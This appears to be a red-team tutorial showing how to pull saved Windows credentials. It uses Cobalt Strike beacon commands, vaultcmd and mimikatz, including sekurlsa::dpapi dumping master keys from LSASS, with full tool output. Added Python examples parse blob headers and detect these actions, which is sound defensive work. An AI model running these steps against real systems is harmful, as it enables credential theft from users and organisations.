Credential Manager is the “digital locker” where Windows stores log-in credentials like usernames, passwords, and addresses. This information can be saved by Windows for use on your local computer.

View credentials

To view the credentials saved in Credential Manager from the command line:

beacon> shell vaultcmd /listcreds:"Windows Credentials" /all
[*] Tasked beacon to run: vaultcmd /listcreds:"Windows Credentials"
[+] host called home, sent: 72 bytes
[+] received output:
Credentials in vault: Windows Credentials

Credential schema: Windows Domain Password Credential
Resource: Domain:target=HOST2
Identity: ryan
Hidden: No
Roaming: No
Property (schema element id,value): (100,3)

The saved credentials are stored as encrypted blobs in C:\Users\<username>\AppData\Local\Microsoft\Credentials\

beacon> ls C:\Users\john\AppData\Local\Microsoft\Credentials
[*] Tasked beacon to list files in C:\Users\john\AppData\Local\Microsoft\Credentials
[+] host called home, sent: 67 bytes
[*] Listing: C:\Users\john\AppData\Local\Microsoft\Credentials\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
 11kb     fil     03/26/2021 09:22:54   DFBE70A7E5CC19A398EBF1B96859CE5D

View Masterkey identifier

We can see which master key the blob was encrypted with by using the mimikatz dpapi module:

beacon> mimikatz dpapi::cred /in:C:\Users\john\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
[*] Tasked beacon to run mimikatz's dpapi::cred /in:C:\Users\john\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D command
[+] host called home, sent: 750701 bytes
[+] received output:
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {746fa65b-3590-4ef5-9c24-ef479ccec600}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 00000030 - 48
  szDescription      : Local Credential Data

  algCrypt           : 00006603 - 26115 (CALG_3DES)
  dwAlgCryptLen      : 000000c0 - 192
  dwSaltLen          : 00000010 - 16
  pbSalt             : 6b7740e19fcddce737f8679062fa4668
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         : 
  algHash            : 00008004 - 32772 (CALG_SHA1)
  dwAlgHashLen       : 000000a0 - 160
  dwHmac2KeyLen      : 00000010 - 16
  pbHmack2Key        : 03b93d00fb1e51d56cdaccf8642c7992
  dwDataLen          : 00002c18 - 11288
  pbData             : c4c7aaf55e053637c[SNIPED]
  dwSignLen          : 00000014 - 20
  pbSign             : a311ceab145131ccfa02525009649f4a2e7fc743

In the above output we mostly care about the:

The master key information is stored in C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<user sid>

beacon> ls C:\Users\john\AppData\Roaming\Microsoft\Protect\
[*] Tasked beacon to list files in C:\Users\john\AppData\Roaming\Microsoft\Protect\
[+] host called home, sent: 65 bytes
[*] Listing: C:\Users\john\AppData\Roaming\Microsoft\Protect\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     03/26/2021 09:22:53   S-1-5-21-2669240679-2768610461-1282890330-1106
 24b      fil     03/26/2021 09:22:54   CREDHIST

beacon> ls C:\Users\john\AppData\Roaming\Microsoft\Protect\S-1-5-21-2669240679-2768610461-1282890330-1106
[*] Tasked beacon to list files in C:\Users\john\AppData\Roaming\Microsoft\Protect\S-1-5-21-2669240679-2768610461-1282890330-1106
[+] host called home, sent: 112 bytes
[*] Listing: C:\Users\john\AppData\Roaming\Microsoft\Protect\S-1-5-21-2669240679-2768610461-1282890330-1106\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
 740b     fil     03/26/2021 09:22:54   746fa65b-3590-4ef5-9c24-ef479ccec600
 884b     fil     03/26/2021 09:22:54   BK-EH
 24b      fil     03/26/2021 09:22:54   Preferred
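
The guidMasterKey field is what ties a credential blob to one file under Protect\<user sid>. The following is an added example, not part of the original page and not mimikatz code: it reads only the cleartext header fields of a DPAPI blob so an analyst can inventory which master key protects which blob. Locating the blob by its provider GUID, the function names and the sample bytes are assumptions of this example.

```python
import struct
import uuid

# DPAPI provider GUID, the guidProvider value in the dpapi::cred output above.
DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
ALG_NAMES = {0x6603: "CALG_3DES", 0x8004: "CALG_SHA1"}  # only the IDs shown on this page
FIXED = struct.Struct("<I16sI16sII")  # dwVersion .. dwDescriptionLen


def parse_blob_header(data: bytes) -> dict:
    """Parse the cleartext header of the first DPAPI blob found in data."""
    pos = data.find(DPAPI_PROVIDER.bytes_le)
    if pos < 4:
        raise ValueError("DPAPI provider GUID not found")
    off = pos - 4  # dwVersion sits directly before guidProvider
    if len(data) < off + FIXED.size:
        raise ValueError("truncated blob header")
    _ver, _prov, mk_version, mk_guid, flags, desc_len = FIXED.unpack_from(data, off)
    off += FIXED.size
    if desc_len % 2 or len(data) < off + desc_len + 4:
        raise ValueError("bad description length")
    desc = data[off:off + desc_len].decode("utf-16-le").rstrip("\x00\r\n")
    (alg_crypt,) = struct.unpack_from("<I", data, off + desc_len)
    return {
        "dwMasterKeyVersion": mk_version,
        "guidMasterKey": str(uuid.UUID(bytes_le=mk_guid)),
        "dwFlags": flags,
        "szDescription": desc,
        "algCrypt": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
    }


def master_key_path(profile: str, sid: str, header: dict) -> str:
    # Hypothetical helper: expected location of the protecting master key file.
    parts = [profile, "AppData", "Roaming", "Microsoft", "Protect", sid]
    return "\\".join(parts + [header["guidMasterKey"]])


def build_sample() -> bytes:
    # Constructed sample: header values copied from the output above, no payload.
    desc = "Local Credential Data\r\n\x00".encode("utf-16-le")  # padded to 48 bytes
    mk = uuid.UUID("746fa65b-3590-4ef5-9c24-ef479ccec600").bytes_le
    blob = FIXED.pack(1, DPAPI_PROVIDER.bytes_le, 1, mk, 0x20000000, len(desc))
    return b"\x00" * 12 + blob + desc + struct.pack("<I", 0x6603)


if __name__ == "__main__":
    print(parse_blob_header(build_sample()))
```
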

Get MasterKey

We need to obtain the master key's SHA1, either from memory or by asking the DC for it.

Find masterkey from cache

We can extract the DPAPI master keys from LSASS memory by running the following mimikatz command: sekurlsa::dpapi

beacon> mimikatz sekurlsa::dpapi
[*] Tasked beacon to run mimikatz's sekurlsa::dpapi command
[+] host called home, sent: 750721 bytes
[+] received output:

Authentication Id : 0 ; 6998111 (00000000:006ac85f)
Session           : Interactive from 4
User Name         : Administrator
Domain            : EH
Logon Server      : EHLAB-DC
Logon Time        : 3/26/2021 11:29:02 AM
SID               : S-1-5-21-2669240679-2768610461-1282890330-500

Authentication Id : 0 ; 5176335 (00000000:004efc0f)
Session           : RemoteInteractive from 4
User Name         : john
Domain            : EH
Logon Server      : EHLAB-DC
Logon Time        : 3/26/2021 9:22:46 AM
SID               : S-1-5-21-2669240679-2768610461-1282890330-1106
	 [00000000]
	 * GUID      :	{746fa65b-3590-4ef5-9c24-ef479ccec600}
	 * Time      :	3/26/2021 11:26:54 AM
	 * MasterKey :	598246dbdc92bf08f075e13c30e6c1f68990e78fa869be10d9cb0e1c8f0947db79279eae0a76d153d77877abb44d1258bdc30997a37c55f63aa5a3cfe4ef1101
	 * sha1(key) :	ab4e69c82cf98682805505384f1683bf475d9f10

In the above output, we look for the entry whose GUID matches the guidMasterKey we identified in the 'View Masterkey identifier' area earlier.
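
Each step in this walkthrough leaves telemetry a defender can match on: the vaultcmd command line, reads of the credential blob and master key files, and access to LSASS memory. The following is an added example (not from the original page) that classifies such events; the event layout, field names, the tool.exe path and the LSASS-only allow-list are assumptions of this example.

```python
import re

# File-name patterns taken from the listings above (32-hex blob, GUID master key).
CRED_BLOB = re.compile(r"\\AppData\\(?:Local|Roaming)\\Microsoft\\Credentials\\[0-9A-F]{32}$", re.I)
MASTER_KEY = re.compile(r"\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-[\d-]+\\[0-9a-f-]{36}$", re.I)
VAULT_ENUM = re.compile(r"\bvaultcmd(?:\.exe)?\s.*?/listcreds", re.I)
# Assumption: only LSASS is expected to touch these objects; tune per environment.
EXPECTED = {"lsass.exe"}


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict):
    """Return a finding label for one normalized event, or None."""
    actor = image_name(event["image"])
    if event["type"] == "process_create":
        return "vault-enumeration" if VAULT_ENUM.search(event["command_line"]) else None
    if actor in EXPECTED:
        return None
    if event["type"] == "file_read":
        if MASTER_KEY.search(event["target"]):
            return "masterkey-file-read"
        if CRED_BLOB.search(event["target"]):
            return "credential-blob-read"
    if event["type"] == "process_access" and image_name(event["target"]) == "lsass.exe":
        return "lsass-memory-access"
    return None


# Constructed sample events (not real telemetry), reusing the paths shown on this page.
APPDATA = r"C:\Users\john\AppData"
TOOL = r"C:\Users\john\Downloads\tool.exe"
LSASS = r"C:\Windows\System32\lsass.exe"
BLOB = APPDATA + r"\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D"
MK = (APPDATA + r"\Roaming\Microsoft\Protect\S-1-5-21-2669240679-2768610461-1282890330-1106"
      r"\746fa65b-3590-4ef5-9c24-ef479ccec600")
SAMPLE_EVENTS = [
    {"type": "process_create", "image": r"C:\Windows\System32\VaultCmd.exe",
     "command_line": 'vaultcmd /listcreds:"Windows Credentials" /all'},
    {"type": "file_read", "image": TOOL, "target": BLOB},
    {"type": "file_read", "image": TOOL, "target": MK},
    {"type": "file_read", "image": LSASS, "target": MK},  # expected reader
    {"type": "process_access", "image": TOOL, "target": LSASS},
]


def findings() -> list:
    return [classify(e) for e in SAMPLE_EVENTS]
```
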